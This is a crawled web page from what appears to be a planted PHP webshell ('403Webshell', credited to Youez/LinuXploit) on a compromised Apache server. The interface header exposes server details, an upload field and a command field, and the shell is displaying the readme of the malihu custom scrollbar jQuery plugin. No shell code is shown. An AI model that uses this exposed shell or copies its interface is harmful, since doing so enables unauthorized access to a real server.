403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/linkabili/node_modules/malihu-custom-scrollbar-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/linkabili/node_modules/malihu-custom-scrollbar-plugin/readme.md
malihu custom scrollbar plugin
================================

Highly customizable custom scrollbar jQuery plugin ([Demo](http://manos.malihu.gr/repository/custom-scrollbar/demo/examples/complete_examples.html)). Features include: 

* Vertical and/or horizontal scrollbar(s)  
* Adjustable scrolling momentum 
* Mouse-wheel, keyboard and touch support 
* Ready-to-use themes and customization via CSS 
* RTL direction support 
* Option parameters for full control of scrollbar functionality 
* Methods for triggering actions like scroll-to, update, destroy etc. 
* User-defined callbacks 
* Selectable/searchable content

**[Plugin homepage and documentation](http://manos.malihu.gr/jquery-custom-content-scroller/)** ([Changelog](http://manos.malihu.gr/jquery-custom-content-scroller/2/)) 

#### Installation

npm: `npm install malihu-custom-scrollbar-plugin` 

Bower: `bower install malihu-custom-scrollbar-plugin` 

[Manual](http://manos.malihu.gr/jquery-custom-content-scroller/#get-started-section) 

#### Usage 

Manual: `$(selector).mCustomScrollbar();` 

[Browserify](http://browserify.org/): 

    var $ = require('jquery');
    require('malihu-custom-scrollbar-plugin')($);

[webpack](https://webpack.github.io/): 

    npm install imports-loader
	npm install jquery-mousewheel
	npm install malihu-custom-scrollbar-plugin

	module.exports = {
		module: {
			loaders: [
				{ test: /jquery-mousewheel/, loader: "imports?define=>false&this=>window" },
				{ test: /malihu-custom-scrollbar-plugin/, loader: "imports?define=>false&this=>window" }
			]
		}
	};

	var $ = require('jquery');
	require("jquery-mousewheel")($);
    require('malihu-custom-scrollbar-plugin')($);


Requirements
-------------------------

jQuery version **1.6.0** or higher

Browser compatibility
-------------------------

* Internet Explorer 8+ 
* Firefox 
* Chrome 
* Opera 
* Safari  
* iOS 
* Android 
* Windows Phone

License 
-------------------------

MIT License (MIT)

http://opensource.org/licenses/MIT

Donate 
-------------------------

https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UYJ5G65M6ZA28

Youez - 2016 - github.com/yon3zu
LinuXploit